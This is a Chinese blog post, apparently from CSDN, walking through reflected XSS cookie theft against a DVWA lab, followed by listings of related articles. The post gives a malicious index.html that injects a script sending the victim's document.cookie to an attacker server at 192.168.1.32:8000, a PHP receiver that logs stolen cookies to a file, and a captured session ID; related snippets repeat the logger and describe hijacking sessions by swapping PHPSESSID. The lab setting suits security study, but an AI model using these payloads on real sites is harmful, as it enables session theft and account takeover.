XSS跨站脚本盗取Cookie

最新推荐文章于 2024-07-17 17:36:22 发布
最新推荐文章于 2024-07-17 17:36:22 发布
阅读量320 收藏 1
点赞数
文章标签: xss 安全 前端
原文链接:https://blog.csdn.net/Rxk17805428997/article/details/120992488?utm_medium=distribute.pc_category.none-task-blog-hot-4.nonecase&depth_1-utm_source=distribute.pc_category.none-task-blog-hot-4.nonecase
版权

一、XSS跨站脚本如何理解

A站访客受到的XSS攻击的代码是来自于B站而不是A站原来就有的脚本代码所以称为跨站

二、XSS跨站脚本攻击的几个主体

1、攻击者

2、攻击服务器(IP:192.168.1.32)

3、受害者

4、受害站点(IP:192.168.1.89)

三、攻击流程

 1、用户正常访问受害站点,站点发送给浏览器cookie,浏览器保存cookie到本地

2、攻击者构造恶意链接或者恶意网站也并诱导用户点击或者访问,恶意网页index.html内容如下:

<!DOCTYPE html>
<html>
<head>
    <title></title>
</head>
<body>
<script>
        document.location="http://192.168.1.89/DVWA/vulnerabilities/xss_r/?name=%3Cscript%3Edocument.location='192.168.1.32:8000/DomXSS.php?cookie='+document.cookie%3C/script%3E"
</script>
</body>
</html>

3、用户访问index.html,index.html中的恶意代码执行将cookie发送给恶意站点的DomXss.php 

$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
 攻击服务器将cookie保存到cookie.txt

security=low; PHPSESSID=93405j0g3666fl24pn6s32criu

qq_43000905
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
跨域Cookie的读取
m0_66876551的博客
04-26 4159
cookie的几个属性 1 httpOnly:true 表示禁止客户端读cookie,即只能在服务端读取它 2 SameSite:用来限制第三方 Cookie,从而减少安全风险。 Strict最为严格,完全禁止第三方 Cookie跨站点时,任何情况下都不会发送 Cookie。换言之,只有当前网页的 URL 与请求目标一致,才会带上 Cookie。 Set-Cookie: CookieName=CookieValue; SameSite=Strict; Lax规则稍稍放宽,大多数情况也是不发送第三方 Co
XSS跨站获取cookie
weixin_34290096的博客
03-09 270
测试环境:hacker端 and victim端1,hacker端(hacker.php)的程序内容如下:<?php$cookie=$_GET['cookie'];$file=fopen("cookie.txt","a");fwrite($file,$cookie);fclose($file)?>2,受害者端(victim.php)的程序内容如下:<...
网络安全学习笔记——盗取Cookies跨站脚本XSS
just do it
07-24 1375
使用替换过了的URL发给目标,诱导目标点击,然后目标的cookies就会回弹到XSS攻击平台上,展开就可以看到该目标的PHPSESSID,然后在自己的同源网站上,笔记本按Fn+F12,调出Hackerbar,点击存储,然后把PHPSESSID换成攻击之后得到的,删掉浏览框里面多余的东西,剩下XXX.php即可,刷新之后就会登录该目标的账号——,SESSID——中间键,是Apache分配的,唯一的“身份证”,从SESSID入手,就可以查取用户的相关信息。
XSSCookie获取练习
0xcc'Blog
04-22 309
#0x00:Cookie获取(Get方式) #0x01:Cookie获取(Post方式) #0x02:XSS钓鱼获取账号密码 我们可以把恶意代码放到网站的后台,当用户点击此网站的连接时,页面会弹出一个输入账号密码的页面,如果用户的安全意识不高,输入的数据就会发送到我们的后台。 #0x03 ...
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击是一种常见的Web应用安全漏洞,攻击者可以通过在网站上注入恶意代码,盗取用户敏感信息,控制企业数据,非法转账,发送恶意邮件等。下面是xss跨站脚本攻击的知识点总结: 1.xss跨站脚本攻击的定义 ...
XSS跨站脚本gj剖析与防御
05-18
XSS(Cross-Site Scripting)跨站脚本攻击是一种常见的网络安全漏洞,它允许攻击者在用户浏览器上执行恶意脚本,从而获取敏感信息、操纵用户界面或进行其他有害操作。这种攻击通常发生在Web应用程序中,因为它们未能...
XSS 跨站脚本攻击及防范
09-07
XSS(Cross Site Scripting)跨站脚本攻击是一种网络安全漏洞,主要针对Web应用程序,让攻击者能够在受害者的浏览器上执行恶意脚本。攻击者通过在网页中插入有害的HTML代码,当用户浏览该页面时,这些代码会被执行,...
18.XSS跨站脚本攻击原理及代码攻防演示(一)1
08-03
XSS(Cross-Site Scripting)跨站脚本攻击是一种常见的网络安全问题,它发生在攻击者通过在网页中注入恶意脚本,使得用户在不知情的情况下执行这些脚本,从而盗取用户数据或者控制用户浏览器的行为。XSS攻击主要分为...
第二节 XSS盗取cookie-01
09-15
XSS盗取cookie详解 在Web安全领域中,XSS(Cross-Site Scripting)是一种常见的攻击手法,通过inject恶意脚本盗取用户的Cookie信息。下面我们将详细介绍XSS盗取cookie的攻击原理、实施方法和防御策略。 Cookie...
【猫客工作室】xss跨站进行cookies欺骗进后台
01-12
【猫客工作室】xss跨站进行cookies欺骗进后台
XSS漏洞利用——验证cookie
cxrpty的博客
02-20 922
实验环境:DVWA、火狐浏览器、bp工具 实验步骤: 一、访问DVWA,登录进去,并抓包获取cookie值 二、访问文件包含界面 三、重新打开浏览器,输入网址直接访问文件包含,发现无法进入 四、抓包文件包含页面,并替换cookie值,即可访问成功 ...
反射型xss偷取cookie(本地验证)
think_ycx的专栏
11-14 3180
原理反射型xss 为危害之一就是:用户在登录的情况下点击了黑客发送的链接,就会导致该网址的cookie泄露,导致帐号被黑客登录。
xss攻击之伪造cookie
热门推荐
Pythonicc的博客
01-23 10万+
xss攻击之伪造cookie靶场地址:XSS盲打利用XSS公开平台生成漏洞利用代码UML 图表 靶场地址: http://59.63.200.79:8004/Feedback.asp XSS盲打 见框就插,输入进行测试 (若有长度限制则在input框中修改最大长度),点击【提交留言】按钮: 随后自动跳转到查看留言界面: 很明显插入的js代码可直接执行,分别执行了这三段代码 尝试刷新后仍然可执...
接收cookie代码与注入盗取cookie代码参考
longger_lee
03-13 2108
document.write('');alert(/XSS/) $cookie = $_GET['cookie']; //以GET方式获取cookie变量值 $ip = getenv ('REMOTE_ADDR'); //远程主机IP地址 $time=date('Y-m-d g:i:s'); //以“年-月-日 时:分:秒”的格式显示时间 $referer=
XSS跨站脚本攻击防御和Cookie,及SSO单点登录原理
逍遥飞鹤的专栏
05-24 1万+
XSS又称CSS,全称Cross SiteScript,跨站脚本攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当其它用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。如,盗取用户Cookie、破坏页面结构、重定向到其它网站等。 XSS攻击        
Web漏洞-Xss跨站
weixin_70557959的博客
05-05 703
[草稿] XSS跨站 发布时间:2022-04-23 21:43:11 作者:weixin_46544151 阅读数:0 标签:web安全,安全,网络安全 文章描述: 25.xss跨站之原理分类及攻击方法 一、本地环境XSS,漏洞原理讲解 在phpstudy中根目录创建1.php <?php $xss=$_GET['x']; echo $xss; ?> 浏览器打开,在网址后输入?x=1,网页输出1 输入?x=<script>alert(1)</script&...
xss漏洞-DVWA跨站攻击盗取用户cookie
CKT_GOD的博客
09-18 3520
程Kaedy.cn-www.kaedy.cn XSS跨站脚本攻击介绍 跨站脚本攻击英文全称为(Cross site Script)缩写为 CSS,但是为了和层叠样式表(Cascading Style Sheet)CSS 区分开来,所以在安全领域跨站脚本攻击叫做 XSS XSS 攻击简介 XSS 攻击通常指黑客通过往 Web 页面中插入恶意 Script 代码,当用户访问网页时恶意代码在用户的 浏览器中被执行,从而劫持用户浏览器窃取用户信息。 1、黑客加在特定 web 页面 index.html 中,加入
【JS】跨域问题读写cookie的解决办法
@point
11-15 4477
跨域Cookie共享:访问A站点时已经登录从而保存姓名、头像等基本信息,这时访问该公司的B站点时就自然而然的能显示出这些基本信息,也就是实现信息共享(在银联体系中A银行办理的卡也能在B银行能取出钱来,也就是实现余额“共享”)
web安全跨站脚本攻击xss
最新发布
奔跑的小猪仔
07-17 983
xss 跨站脚本攻击。它指的是恶意攻击者往web页面里插入恶意js代码,当用户浏览该页之时,嵌入其中web里面的js代码会被执行,从而达到恶意的特殊目的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值